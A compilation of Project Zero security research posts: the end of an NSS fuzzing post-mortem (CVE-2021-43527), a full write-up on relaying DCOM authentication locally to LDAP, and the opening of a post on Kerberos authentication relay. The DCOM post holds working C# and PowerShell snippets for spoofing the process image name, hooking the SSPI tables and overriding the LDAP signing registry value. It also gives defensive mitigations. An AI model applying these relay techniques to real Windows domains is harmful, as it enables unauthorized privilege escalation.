I wish that I could say that discovering this bug validates my ideas, but I’m not sure it does. I was doing some moderately novel fuzzing, but I see no reason this bug couldn’t have been found earlier with even rudimentary fuzzing techniques.

Lessons Learned

How did extensive, customized fuzzing with impressive coverage metrics fail to discover this bug?

What went wrong

Issue #1 Missing end-to-end testing.

NSS is a modular library. This layered design is reflected in the fuzzing approach, as each component is fuzzed independently. For example, the QuickDER decoder is tested extensively, but the fuzzer simply creates and discards objects and never uses them.

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {

 char *dest[2048];

 for (auto tpl : templates) {

   PORTCheapArenaPool pool;

   SECItem buf = {siBuffer, const_cast<unsigned char *>(Data),

                  static_cast<unsigned int>(Size)};

   PORT_InitCheapArena(&pool, DER_DEFAULT_CHUNKSIZE);

   (void)SEC_QuickDERDecodeItem(&pool.arena, dest, tpl, &buf);

   PORT_DestroyCheapArena(&pool);

 }

Fig 5. The QuickDER fuzzer simply creates and discards objects. This verifies the ASN.1 parsing, but not whether other components handle the resulting objects correctly.

This fuzzer might have produced a SECKEYPublicKey that could have reached the vulnerable code, but as the result was never used to verify a signature, the bug could never be discovered.

Issue #2 Arbitrary size limits.

There is an arbitrary limit of 10000 bytes placed on fuzzed input. There is no such limit within NSS; many structures can exceed this size. This vulnerability demonstrates that errors happen at extremes, so this limit should be chosen thoughtfully.

A reasonable choice might be 224-1 bytes, the largest possible certificate that can be presented by a server during a TLS handshake negotiation.

While NSS might handle objects even larger than this, TLS cannot possibly be involved, reducing the overall severity of any vulnerabilities missed.

Issue #3 Misleading metrics.

All of the NSS fuzzers are represented in combined coverage metrics by oss-fuzz, rather than their individual coverage. This data proved misleading, as the vulnerable code is fuzzed extensively but by fuzzers that could not possibly generate a relevant input.

This is because fuzzers like the tls_server_target use fixed, hardcoded certificates. This exercises code relevant to certificate verification, but only fuzzes TLS messages and protocol state changes.

What Worked

  • The design of the mozilla::pkix validation library prevented this bug from being worse than it could have been. Unfortunately it is unused outside of Firefox and Thunderbird.

It’s debatable whether this was just good fortune or not. It seems likely RSA-PSS would eventually be permitted by mozilla::pkix, even though it was not today.

Recommendations

This issue demonstrates that even extremely well-maintained C/C++ can have fatal, trivial mistakes.

Short Term

  • Raise the maximum size of ASN.1 objects produced by libFuzzer from 10,000 to 224-1 = 16,777,215 ¬†bytes.
  • The QuickDER fuzzer should call some relevant APIs with any objects successfully created before destroying them.
  • The oss-fuzz code coverage metrics should be divided by fuzzer, not by project.

Solution

This vulnerability is CVE-2021-43527, and is resolved in NSS 3.73.0. If you are a vendor that distributes NSS in your products, you will most likely need to update or backport the patch.

Credits

I would not have been able to find this bug without assistance from my colleagues from Chrome, Ryan Sleevi and David Benjamin, who helped answer my ASN.1 encoding questions and engaged in thoughtful discussion on the topic.

Thanks to the NSS team, who helped triage and analyze the vulnerability.


[1] In this minimal example, a workaround if source was available would be to use a combination of sancov's data-flow instrumentation options, but that also fails on more complex variants.

‚úáGoogle Project Zero

Windows Exploitation Tricks: Relaying DCOM Authentication

By: Ryan ‚ÄĒ

Posted by James Forshaw, Project Zero

In my previous blog post I discussed the possibility of relaying Kerberos authentication from a DCOM connection. I was originally going to provide a more in-depth explanation of how that works, but as it's quite involved I thought it was worthy of its own blog post. This is primarily a technique to get relay authentication from another user on the same machine and forward that to a network service such as LDAP. You could use this to escalate privileges on a host using a technique similar to a blog post from Shenanigans Labs but removing the requirement for the WebDAV service. Let's get straight to it.

Background

The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021.

The key feature that the exploit abused is standard COM marshaling. Specifically when a COM object is marshaled so that it can be used by a different process or host, the COM runtime generates an OBJREF structure, most commonly the OBJREF_STANDARD form. This structure contains all the information necessary to establish a connection between a COM client and the original object in the COM server.

Connecting to the original object from the OBJREF is a two part process:

  1. The client extracts the Object Exporter ID (OXID) from the structure and contacts the OXID resolver service specified by the RPC binding information in the OBJREF.
  2. The client uses the OXID resolver service to find the RPC binding information of the COM server which hosts the object and establishes a connection to the RPC endpoint to access the object's interfaces.

Both of these steps require establishing an MSRPC connection to an endpoint. Commonly this is either locally over ALPC, or remotely via TCP. If a TCP connection is used then the client will also authenticate to the RPC server using NTLM or Kerberos based on the security bindings in the OBJREF.

The first key insight I had for issue 325 is that you can construct an OBJREF which will always establish a connection to the OXID resolver service over TCP, even if the service was on the local machine. To do this you specify the hostname as an IP address and an arbitrary TCP port for the client to connect to. This allows you to listen locally and when the RPC connection is made the authentication can be relayed or repurposed.

This isn't yet a privilege escalation, since you need to convince a privileged user to unmarshal the OBJREF. This was the second key insight: you could get a privileged service to unmarshal an arbitrary OBJREF easily using the CoGetInstanceFromIStorage API and activating a privileged COM service. This marshals a COM object, creates the privileged COM server and then unmarshals the object in the server's security context. This results in an RPC call to the fake OXID resolver authenticated using a privileged user's credentials. From there the authentication could be relayed to the local system for privilege escalation.

Diagram of an DCOM authentication relay attack from issue 325

Being able to redirect the OXID resolver RPC connection locally to a different TCP port was not by design and Microsoft eventually fixed this in Windows 10 1809/Server 2019. The underlying issue prior to Windows 10 1809 was the string containing the host returned as part of the OBJREF was directly concatenated into an RPC string binding. Normally the RPC string binding should have been in the form of:

ncacn_ip_tcp:ADDRESS[135]

Where ncacn_ip_tcp is the protocol sequence for RPC over TCP, ADDRESS is the target address which would come from the string binding, and [135] is the well-known TCP port for the OXID resolver appended by RPCSS. However, as the ADDRESS value is inserted manually into the binding then the OBJREF could specify its own port, resulting in the string binding:

ncacn_ip_tcp:ADDRESS[9999][135]

The RPC runtime would just pick the first port in the binding string to connect to, in this case 9999, and would ignore the second port 135. This behavior was fixed by calling the RpcStringBindingCompose API which will correctly escape the additional port number which ensures it's ignored when making the RPC connection.

This is where the RemotePotato exploit, developed by Antonio Cocomazzi and Andrea Pierini, comes into the picture. While it was no longer possible to redirect the OXID resolving to a local TCP server, you could redirect the initial connection to an external server. A call is made to the IObjectExporter::ResolveOxid2 method which can return an arbitrary RPC binding string for a fake COM object.

Unlike the OXID resolver binding string, the one for the COM object is allowed to contain an arbitrary TCP port. By returning a binding string for the original host on an arbitrary TCP port, the second part of the connection process can be relayed rather than the first. The relayed authentication can then be sent to a domain server, such as LDAP or SMB, as long as they don't enforce signing.

Diagram of an DCOM authentication relay attack from Remote Potato

This exploit has the clear disadvantage of requiring an external machine to act as the target of the initial OXID resolving. While investigating the Kerberos authentication relay attacks for DCOM, could I find a way to do everything on the same machine?

Remote ‚ěú Local Potato

If we're relaying the authentication for the second RPC connection, could we get the local OXID resolver to do the work for us and resolve to a local COM server on a randomly selected port? One of my goals is to write the least amount of code, which is why we'll do everything in C# and .NET.

byte[] ba = GetMarshalledObject(new object());

var std = COMObjRefStandard.FromArray(ba);

Console.WriteLine("IPID: {0}", std.Ipid);

Console.WriteLine("OXID: {0:X08}", std.Oxid);

Console.WriteLine("OID : {0:X08}", std.Oid);

std.StringBindings.Clear();

std.StringBindings.Add(RpcTowerId.Tcp, "127.0.0.1");

Console.WriteLine($"objref:{0}:", Convert.ToBase64String(std.ToArray());

This code creates a basic .NET object and COM marshals it to a standard OBJREF. I've left out the code for the marshalling and parsing of the OBJREF, but much of that is already present in the linked issue 325. We then modify the list of string bindings to only include a TCP binding for 127.0.0.1, forcing the OXID resolver to use TCP. If you specify a computer's hostname then the OXID resolver will use ALPC instead. Note that the string bindings in the OBJREF are only for binding to the OXID resolver, not the COM server itself.

We can then convert the modified OBJREF into an objref moniker. This format is useful as it allows us to trivially unmarshal the object in another process by calling the Marshal::BindToMoniker API in .NET and passing the moniker string. For example to bind to the COM object in PowerShell you can run the following command:

[Runtime.InteropServices.Marshal]::BindToMoniker("objref:TUVP...:")

Immediately after binding to the moniker a firewall dialog is likely to appear as shown:

Firewall dialog for the COM server when a TCP binding is created

This is requesting the user to allow our COM server process access to listen on all network interfaces for incoming connections. This prompt only appears when the client tries to resolve the OXID as DCOM supports dynamic RPC endpoints. Initially when the COM server starts it only listens on ALPC, but the RPCSS service can ask the server to bind to additional endpoints.

This request is made through an internal RPC interface that every COM server implements for use by the RPCSS service. One of the functions on this interface is UseProtSeq, which requests that the COM server enables a TCP endpoint. When the COM server receives the UseProtSeq call it tries to bind a TCP server to all interfaces, which subsequently triggers the Windows Defender Firewall to prompt the user for access.

Enabling the firewall permission requires administrator privileges. However, as we only need to listen for connections via localhost we shouldn't need to modify the firewall so the dialog can be dismissed safely. However, going back to the COM client we'll see an error reported.

Exception calling "BindToMoniker" with "1" argument(s):

"The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)"

If we allow our COM server executable through the firewall, the client is able to connect over TCP successfully. Clearly the firewall is affecting the behavior of the COM client in some way even though it shouldn't. Tracing through the unmarshalling process in the COM client, the error is being returned from RPCSS when trying to resolve the OXID's binding information. This would imply that no connection attempt is made, and RPCSS is detecting that the COM server wouldn't be allowed through the firewall and refusing to return any binding information for TCP.

Further digging into RPCSS led me to the following function:

BOOL IsPortOpen(LPWSTR ImageFileName, int PortNumber) {

  INetFwMgr* mgr;

 

  CoCreateInstance(CLSID_FwMgr, NULL, CLSCTX_INPROC_SERVER, 

                   IID_PPV_ARGS(&mgr));

  VARIANT Allowed;

  VARIANT Restricted;

  mgr->IsPortAllowed(ImageFileName, NET_FW_IP_VERSION_ANY, 

             PortNumber, NULL, NET_FW_IP_PROTOCOL_TCP,

             &Allowed, &Restricted);

  if (VT_BOOL != Allowed.vt)

    return FALSE;

  return Allowed.boolVal == VARIANT_TRUE;

}

This function uses the HNetCfg.FwMgr COM object, and calls INetFwMgr::IsPortAllowed to determine if the process is allowed to listen on the specified TCP port. This function is called for every TCP binding when enumerating the COM server's bindings to return to the client. RPCSS passes the full path to the COM server's executable and the listening TCP port. If the function returns FALSE then RPCSS doesn't consider it valid and won't add it to the list of potential bindings.

If the OXID resolving process doesn't have any binding at the end of the lookup process it will return the RPC_S_SERVER_UNAVAILABLE error and the COM client will fail to bind to the server. How can we get around this limitation without needing administrator privileges to allow our server through the firewall? We can convert this C++ code into a small PowerShell function to test the behavior of the function to see what would grant access.

function Test-IsPortOpen {

    param(

        [string]$Name,

        [int]$Port

    )

    $mgr = New-Object -ComObject "HNetCfg.FwMgr"

    $allow = $null

    $mgr.IsPortAllowed($Name, 2, $Port, "", 6, [ref]$allow, $null)

    $allow

}

foreach($f in $(ls "$env:WINDIR\system32\*.exe")) {    

    if (Test-IsPortOpen $f.FullName 12345) {

        Write-Host $f.Fullname

    }

}

This script enumerates all executable files in system32 and checks if they'd be allowed to connect to TCP port 12345. Normally the TCP port would be selected automatically, however the COM server can use the RpcServerUseProtseqEp API to pre-register a known TCP port for RPC communication, so we'll just pick port 12345.

The only executable in system32 that returns true from Test-IsPortOpen is svchost.exe. That makes some sense, the default firewall rules usually permit a limited number of services to be accessible through the firewall, the majority of which are hosted in a shared service process.

This check doesn't guarantee a COM server will be allowed through the firewall, just that it's potentially accessible in order to return a TCP binding string. As the connection will be via localhost we don't need to be allowed through the firewall, only that IsPortOpen thinks we could be open. How can we spoof the image filename?

The obvious trick would be to create a svchost.exe process and inject our own code in there. However, that is harder to achieve through pure .NET code and also injecting into an svchost executable is a bit of a red flag if something is monitoring for malicious code which might make the exploit unreliable. Instead, perhaps we can influence the image filename used by RPCSS?

Digging into the COM runtime, when a COM server registers itself with RPCSS it passes its own image filename as part of the registration information. The runtime gets the image filename through a call to GetModuleFileName, which gets the value from the ImagePathName field in the process parameters block referenced by the PEB.

We can modify this string in our own process to be anything we like, then when COM is initialized, that will be sent to RPCSS which will use it for the firewall check. Once the check passes, RPCSS will return the TCP string bindings for our COM server when unmarshalling the OBJREF and the client will be able to connect. This can all be done with only minor in-process modifications from .NET and no external servers required.

Capturing Authentication

At this point a new RPC connection will be made to our process to communicate with the marshaled COM object. During that process the COM client must authenticate, so we can capture and relay that authentication to another service locally or remotely. What's the best way to capture that authentication traffic?

Before we do anything we need to select what authentication we want to receive, and this will be reflected in the OBJREF's security bindings. As we're doing everything using the existing COM runtime we can register what RPC authentication services to use when calling CoInitializeSecurity in the COM server through the asAuthSvc parameter.

var svcs = new SOLE_AUTHENTICATION_SERVICE[] {

    new SOLE_AUTHENTICATION_SERVICE() {

      dwAuthnSvc = RpcAuthenticationType.Kerberos,

      pPrincipalName = "HOST/DC.domain.com"

    }

};

var str = SetProcessModuleName("System");

try

{

   CoInitializeSecurity(IntPtr.Zero, svcs.Length, svcs,

        IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,

        ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,

        EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,

        IntPtr.Zero);

}

finally

{

    SetProcessModuleName(str);

}

In the above code, we register to only receive Kerberos authentication and we can also specify an arbitrary SPN as I described in the previous blog post. One thing to note is that the call to CoInitializeSecurity will establish the connection to RPCSS and pass the executable filename. Therefore we need to modify the filename before calling the API as we can't change it after the connection has been established.

For swag points I specify the filename System rather than build the full path to svchost.exe. This is the name assigned to the kernel which is also granted access through the firewall. We restore the original filename after the call to CoInitializeSecurity to reduce the risk of it breaking something unexpectedly.

That covers the selection of the authentication service to use, but doesn't help us actually capture that authentication. My first thought to capture the authentication was to find the socket handle for the TCP server, close it and create a new socket in its place. Then I could directly process the RPC protocol and parse out the authentication. This felt somewhat risky as the RPC runtime would still think it has a valid TCP server socket and might fail in unexpected ways. Also it felt like a lot of work, when I have a perfectly good RPC protocol parser built into Windows.

I then resigned myself to hooking the SSPI APIs, although ideally I'd prefer not to do so. However, once I started looking at the RPC runtime library there weren't any imports for the SSPI APIs to hook into and I really didn't want to patch the functions themselves. It turns out that the RPC runtime loads security packages dynamically, based on the authentication service requested and the configuration of the HKLM\SOFTWARE\Microsoft\Rpc\SecurityService registry key.

Screenshot of the Registry Editor showing HKLM\SOFTWARE\Microsoft\Rpc\SecurityService key

The key, shown in the above screenshot has a list of values. The value's name is the number assigned to the authentication service, for example 16 is RPC_C_AUTHN_GSS_KERBEROS. The value's data is then the name of the DLL to load which provides the API, for Kerberos this is sspicli.dll.

The RPC runtime then loads a table of security functions from the DLL by calling its exported InitSecurityInterface method. At least for sspicli the table is always the same and is a pre-initialized structure in the DLL's data section. This is perfect, we can just call InitSecurityInterface before the RPC runtime is initialized to get a pointer to the table then modify its function pointers to point to our own implementation of the API. As an added bonus the table is in a writable section of the DLL so we don't even need to modify the memory protection.

Of course implementing the hooks is non-trivial. This is made more complex because RPC uses the DCE style Kerberos authentication which requires two tokens from the client before the server considers the authentication complete. This requires maintaining more state to keep the RPC server and client implementations happy. I'll leave this as an exercise for the reader.

Choosing a Relay Target Service

The next step is to choose a suitable target service to relay the authentication to. For issue 325 I relayed the authentication to the same machine's DCOM activator RPC service and was able to achieve an arbitrary file write.

I thought that maybe I could do so again, so I modified my .NET RPC client to handle the relayed authentication and tried accessing local RPC services. No matter what RPC server or function I called, I always got an access denied error. Even if I wrote my own RPC server which didn't have any checks, it would fail.

Digging into the failure it turned out that at some point (I don't know specifically when), Microsoft added a mitigation into the RPC runtime to make it very difficult to relay authentication back to the same system.

void SSECURITY_CONTEXT::ValidateUpgradeCriteria() {

  if (this->AuthnLevel < RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) {

    if (IsLoopback())

      this->UnsafeLoopbackAuth = TRUE;

  }

}

The SSECURITY_CONTEXT::ValidateUpgradeCriteria method is called when receiving RPC authentication packets. If the authentication level for the RPC connection is less than RPC_C_AUTHN_LEVEL_PKT_INTEGRITY such as RPC_C_AUTHN_LEVEL_PKT_CONNECT and the authentication was from the same system then a flag is set to true in the security context. The IsLoopback function calls the QueryContextAttributes API for the undocumented SECPKG_ATTR_IS_LOOPBACK attribute value from the server security context. This attribute indicates if the authentication was from the local system.

When an RPC call is made the server will check if the flag is true, if it is then the call will be immediately rejected before any code is called in the server including the RPC interface's security callback. The only way to pass this check is either the authentication doesn't come from the local system or the authentication level is RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above which then requires the client to know the session key for signing or encryption. The RPC client will also check for local authentication and will increase the authentication level if necessary. This is an effective way of preventing the relay of local authentication to elevate privileges.

Instead as I was focussing on Kerberos, I came to the conclusion that relaying the authentication to an enterprise network service was more useful. As the default settings for a domain controller's LDAP service still do not enforce signing, it would seem a reasonable target. As we'll see, this provides a limitation of the source of the authentication, as it must not enable Integrity otherwise the LDAP server will enforce signing.

The problem with LDAP is I didn't have any code which implemented the protocol. I'm sure there is some .NET code to do it somewhere, but the fewer dependencies I have the better. As I mentioned in the previous blog post, Windows has a builtin LDAP library in wldap32.dll. Could I repurpose its API but convert it into using relayed authentication?

Unsurprisingly the library doesn't have a "Enable relayed authentication" mode, but after a few minutes in a disassembler, it was clear it was also delay-loading the SSPI interfaces through the InitSecurityInterface method. I could repurpose my code for capturing the authentication for relaying the authentication. There was initially a minor issue, accidentally or on purpose there was a stray call to QueryContextAttributes which was directly imported, so I needed to patch that through an Import Address Table (IAT) hook as distasteful as that was.

There was still a problem however. When the client connects it always tries to enable LDAP signing, as we are relaying authentication with no access to the session key this causes the connection to fail. Setting the option value LDAP_OPT_SIGN in the library to false didn't change this behavior. I needed to set the LdapClientIntegrity registry value to 0 in the LDAP service's key before initializing the library. Unfortunately that key is only modifiable by administrators. I could have modified the library itself, but as it was checking the key during DllMain it would be a complex dance to patch the DLL in the middle of loading.

Instead I decided to override the HKEY_LOCAL_MACHINE key. This is possible for the Win32 APIs by using the RegOverridePredefKey API. The purpose of the API is to allow installers to redirect administrator-only modifications to the registry into a writable location, however for our purposes we can also use it to redirect the reading of the LdapClientIntegrity registry value.

[DllImport("Advapi32.dll")]

static extern int RegOverridePredefKey(

    IntPtr hKey,

    IntPtr hNewHKey

);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]

static extern IntPtr LoadLibrary(string libname);

static readonly IntPtr HKEY_LOCAL_MACHINE = new IntPtr(-2147483646);

static void OverrideLocalMachine(RegistryKey key)

{

    int res = RegOverridePredefKey(HKEY_LOCAL_MACHINE,

        key?.Handle.DangerousGetHandle() ?? IntPtr.Zero);

    if (res != 0)

        throw new Win32Exception(res);

}

static void LoadLDAPLibrary()

{

    string dummy = @"SOFTWARE\DUMMY";

    string target = @"System\CurrentControlSet\Services\LDAP";

    using (var key = Registry.CurrentUser.CreateSubKey(dummy, true))

    {

        using (var okey = key.CreateSubKey(target, true))

        {

            okey.SetValue("LdapClientIntegrity", 0,

                          RegistryValueKind.DWord);

            OverrideLocalMachine(key);

            try

            {

                IntPtr lib = LoadLibrary("wldap32.dll");

                if (lib == IntPtr.Zero)

                    throw new Win32Exception();

            }

            finally

            {

                OverrideLocalMachine(null);

                Registry.CurrentUser.DeleteSubKeyTree(dummy);

            }

        }

    }

}

This code redirects the HKEY_LOCAL_MACHINE key and then loads the LDAP library. Once it's loaded we can then revert the override so that everything else works as expected. We can now repurpose the built-in LDAP library to relay Kerberos authentication to the domain controller. For the final step, we need a privileged COM service to unmarshal the OBJREF to start the process.

Choosing a COM Unmarshaller

The RemotePotato attack assumes that a more privileged user is authenticated on the same machine. However I wanted to see what I could do without that requirement. Realistically the only thing that can be done is to relay the computer's domain account to the LDAP server.

To get access to authentication for the computer account, we need to unmarshal the OBJREF inside a process running as either SYSTEM or NETWORK SERVICE. These local accounts are mapped to the computer account when authenticating to another machine on the network.

We do have one big limitation on the selection of a suitable COM server: it must make the RPC connection using the RPC_C_AUTHN_LEVEL_PKT_CONNECT authentication level. Anything above that will enable Integrity on the authentication which will prevent us relaying to LDAP. Fortunately RPC_C_AUTHN_LEVEL_PKT_CONNECT is the default setting for DCOM, but unfortunately all services which use the svchost process change that default to RPC_C_AUTHN_LEVEL_PKT which enables Integrity.

After a bit of hunting around with OleViewDotNet, I found a good candidate class, CRemoteAppLifetimeManager (CLSID: 0bae55fc-479f-45c2-972e-e951be72c0c1) which is hosted in its own executable, runs as NETWORK SERVICE, and doesn't change any default settings as shown below.

Screenshot of the OleViewDotNet showing the security flags of the CRemoteAppLifetimeManager COM server

The server doesn't change the default impersonation level from RPC_C_IMP_LEVEL_IDENTIFY, which means the negotiated token will only be at SecurityIdentification level. For LDAP, this doesn't matter as it only uses the token for access checking, not to open resources. However, this would prevent using the same authentication to access something like the SMB server. I'm confident that given enough effort, a COM server with both RPC_C_AUTHN_LEVEL_PKT_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE could be found, but it wasn't necessary for my exploit.

Wrapping Up

That's a somewhat complex exploit. However, it does allow for authentication relay, with arbitrary Kerberos tokens from a local user to LDAP on a default Windows 10 system. Hopefully it might provide some ideas of how to implement something similar without always needing to write your protocol servers and clients and just use what's already available.

This exploit is very similar to the existing RemotePotato exploit that Microsoft have already stated will not be fixed. This is because Microsoft considers authentication relay attacks to be an issue with the configuration of the Windows network, such as not enforcing signing on LDAP, rather than the particular technique used to generate the authentication relay. As I mentioned in the previous blog post, at most this would be assessed as a Moderate severity issue which does not reach the bar for fixing as part of regular updates (or potentially, not being fixed at all).

As for mitigating this issue without it being fixed by Microsoft, a system administrator should follow Microsoft's recommendations to enable signing and/or encryption on any sensitive service in the domain, especially LDAP. They can also enable Extended Protection for Authentication where the service is protected by TLS. They can also configure the default DCOM authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above. These changes would make the relay of Kerberos, or NTLM significantly less useful.

‚úáGoogle Project Zero

Using Kerberos for Authentication Relay Attacks

By: Ryan ‚ÄĒ

Posted by James Forshaw, Project Zero

This blog post is a summary of some research I've been doing into relaying Kerberos authentication in Windows domain environments. To keep this blog shorter I am going to assume you have a working knowledge of Windows network authentication, and specifically Kerberos and NTLM. For a quick primer on Kerberos see this page which is part of Microsoft's Kerberos extension documentation or you can always read RFC4120.

Background

Windows based enterprise networks rely on network authentication protocols, such as NT Lan Manager (NTLM) and Kerberos to implement single sign on. These protocols allow domain users to seamlessly connect to corporate resources without having to repeatedly enter their passwords. This works by the computer's Local Security Authority (LSA) process storing the user's credentials when the user first authenticates. The LSA can then reuse those credentials for network authentication without requiring user interaction.

However, the convenience of not prompting the user for their credentials when performing network authentication has a downside. To be most useful, common clients for network protocols such as HTTP or SMB must automatically perform the authentication without user interaction otherwise it defeats the purpose of avoiding asking the user for their credentials.

This automatic authentication can be a problem if an attacker can trick a user into connecting to a server they control. The attacker could induce the user's network client to start an authentication process and use that information to authenticate to an unrelated service allowing the attacker to access that service's resources as the user. When the authentication protocol is captured and forwarded to another system in this way it's referred to as an Authentication Relay attack.

Simple diagram of an authentication relay attack

Authentication relay attacks using the NTLM protocol were first published all the way back in 2001 by Josh Buchbinder (Sir Dystic) of the Cult of the Dead Cow. However, even in 2021 NTLM relay attacks still represent a threat in default configurations of Windows domain networks. The most recent major abuse of NTLM relay was through the Active Directory Certificate Services web enrollment service. This combined with the PetitPotam technique to induce a Domain Controller to perform NTLM authentication allows for a Windows domain to be compromised by an unauthenticated attacker.

Over the years Microsoft has made many efforts to mitigate authentication relay attacks. The best mitigations rely on the fact that the attacker does not have knowledge of the user's password or control over the authentication process. This includes signing and encryption (sealing) of network traffic using a session key which is protected by the user's password or channel binding as part of Extended Protection for Authentication (EPA) which prevents relay of authentication to a network protocol under TLS.

Another mitigation regularly proposed is to disable NTLM authentication either for particular services or network wide using Group Policy. While this has potential compatibility issues, restricting authentication to only Kerberos should be more secure. That got me thinking, is disabling NTLM sufficient to eliminate authentication relay attacks on Windows domains?

Why are there no Kerberos Relay Attacks?

The obvious question is, if NTLM is disabled could you relay Kerberos authentication instead? Searching for Kerberos Relay attacks doesn't yield much public research that I could find. There is the krbrelayx tool written by Dirk-jan which is similar in concept to the ntlmrelayx tool in impacket, a common tool for performing NTLM authentication relay attacks. However as the accompanying blog post makes clear this is a tool to abuse unconstrained delegation rather than relay the authentication.

I did find a recent presentation by Sagi Sheinfeld, Eyal Karni, Yaron Zinar from Crowdstrike at Defcon 29 (and also coming up at Blackhat EU 2021) which relayed Kerberos authentication. The presentation discussed MitM network traffic to specific servers, then relaying the Kerberos authentication. A MitM attack relies on being able to spoof an existing server through some mechanism, which is a well known risk.  The last line in the presentation is "Microsoft Recommendation: Avoid being MITM’d…" which seems a reasonable approach to take if possible.

However a MitM attack is slightly different to the common NTLM relay attack scenario where you can induce a domain joined system to authenticate to a server an attacker controls and then forward that authentication to an unrelated service. NTLM is easy to relay as it wasn't designed to distinguish authentication to a particular service from any other. The only unique aspect was the server (and later client) challenge but that value wasn't specific to the service and so authentication for say SMB could be forwarded to HTTP and the victim service couldn't tell the difference. Subsequently EPA has been retrofitted onto NTLM to make the authentication specific to a service, but due to backwards compatibility these mitigations aren't always used.

On the other hand Kerberos has always required the target of the authentication to be specified beforehand through a principal name, typically this is a Service Principal Name (SPN) although in certain circumstances it can be a User Principal Name (UPN). The SPN is usually represented as a string of the form CLASS/INSTANCE:PORT/NAME, where CLASS is the class of service, such as HTTP or CIFS, INSTANCE is typically the DNS name of the server hosting the service and PORT and NAME are optional.

The SPN is used by the Kerberos Ticket Granting Server (TGS) to select the shared encryption key for a Kerberos service ticket generated for the authentication. This ticket contains the details of the authenticating user based on the contents of the Ticket Granting Ticket (TGT) that was requested during the user's initial Kerberos authentication process. The client can then package the service's ticket into an Authentication Protocol Request (AP_REQ) authentication token to send to the server.

Without knowledge of the shared encryption key the Kerberos service ticket can't be decrypted by the service and the authentication fails. Therefore if Kerberos authentication is attempted to an SMB service with the SPN CIFS/fileserver.domain.com, then that ticket shouldn't be usable if the relay target is a HTTP service with the SPN HTTP/fileserver.domain.com, as the shared key should be different.

In practice that's rarely the case in Windows domain networks. The Domain Controller associates the SPN with a user account, most commonly the computer account of the domain joined server and the key is derived from the account's password. The CIFS/fileserver.domain.com and HTTP/fileserver.domain.com SPNs would likely be assigned to the FILESERVER$ computer account, therefore the shared encryption key will be the same for both SPNs and in theory the authentication could be relayed from one service to the other. The receiving service could query for the authenticated SPN string from the authentication APIs and then compare it to its expected value, but this check is typically optional.

The selection of the SPN to use for the Kerberos authentication is typically defined by the target server's host name. In a relay attack the attacker's server will not be the same as the target. For example, the SMB connection might be targeting the attacker's server, and will assign the SPN CIFS/evil.com. Assuming this SPN is even registered it would in all probability have a different shared encryption key to the CIFS/fileserver.domain.com SPN due to the different computer accounts. Therefore relaying the authentication to the target SMB service will fail as the ticket can't be decrypted.

The requirement that the SPN is associated with the target service's shared encryption key is why I assume few consider Kerberos relay attacks to be a major risk, if not impossible. There's an assumption that an attacker cannot induce a client into generating a service ticket for an SPN which differs from the host the client is connecting to.

However, there's nothing inherently stopping Kerberos authentication being relayed if the attacker can control the SPN. The only way to stop relayed Kerberos authentication is for the service to protect itself through the use of signing/sealing or channel binding which rely on the shared knowledge between the client and server, but crucially not the attacker relaying the authentication. However, even now these service protections aren't the default even on critical protocols such as LDAP.

As the only limit on basic Kerberos relay (in the absence of service protections) is the selection of the SPN, this research focuses on how common protocols select the SPN and whether it can be influenced by the attacker to achieve Kerberos authentication relay.

Kerberos Relay Requirements

It's easy to demonstrate in a controlled environment that Kerberos relay is possible. We can write a simple client which uses the Security Support Provider Interface (SSPI) APIs to communicate with the LSA and implement the network authentication. This client calls the InitializeSecurityContext API which will generate an AP_REQ authentication token containing a Kerberos Service Ticket for an arbitrary SPN. This AP_REQ can be forwarded to an intermediate server and then relayed to the service the SPN represents. You'll find this will work, again to reiterate, assuming that no service protections are in place.

However, there are some caveats in the way a client calls InitializeSecurityContext which will impact how useful the generated AP_REQ is even if the attacker can influence the SPN. If the client specifies any one of the following request flags, ISC_REQ_CONFIDENTIALITY, ISC_REQ_INTEGRITY, ISC_REQ_REPLAY_DETECT or ISC_REQ_SEQUENCE_DETECT then the generated AP_REQ will enable encryption and/or integrity checking. When the AP_REQ is received by the server using the AcceptSecurityContext API it will return a set of flags which indicate if the client enabled encryption or integrity checking. Some services use these returned flags to opportunistically enable service protections.

For example LDAP's default setting is to enable signing/encryption if the client supports it. Therefore you shouldn't be able to relay Kerberos authentication to LDAP if the client enabled any of these protections. However, other services such as HTTP don't typically support signing and sealing and so will happily accept authentication tokens which specify the request flags.

Another caveat is the client could specify channel binding information, typically derived from the certificate used by the TLS channel used in the communication. The channel binding information can be controlled by the attacker, but not set to arbitrary values without a bug in the TLS implementation or the code which determines the channel binding information itself.

While services have an option to only enable channel binding if it's supported by the client, all Windows Kerberos AP_REQ tokens indicate support through the KERB_AP_OPTIONS_CBT options flag in the authenticator. Sagi Sheinfeld et al did demonstrate (see slide 22 in their presentation) that if you can get the AP_REQ from a non-Windows source it will not set the options flag and so no channel binding is enforced, but that was apparently not something Microsoft will fix. It is also possible that a Windows client disables channel binding through a registry configuration option, although that seems to be unlikely in real world networks.

If the client specifies the ISC_REQ_MUTUAL_AUTH request flag when generating the initial AP_REQ it will enable mutual authentication between the client and server. The client expects to receive an Authentication Protocol Response (AP_REP) token from the server after sending the AP_REQ to prove it has possession of the shared encryption key. If the server doesn't return a valid AP_REP the client can assume it's a spoofed server and refuse to continue the communication.

From a relay perspective, mutual authentication doesn't really matter as the server is the target of the relay attack, not the client. The target server will assume the authentication has completed once it's accepted the AP_REQ, so that's all the attacker needs to forward. While the server will generate the AP_REP and return it to the attacker they can just drop it unless they need the relayed client to continue to participate in the communication for some reason.

One final consideration is that the SSPI APIs have two security packages which can be used to implement Kerberos authentication, Negotiate and Kerberos. The Negotiate protocol wraps the AP_REQ (and other authentication tokens) in the SPNEGO protocol whereas Kerberos sends the authentication tokens using a simple GSS-API wrapper (see RFC4121).

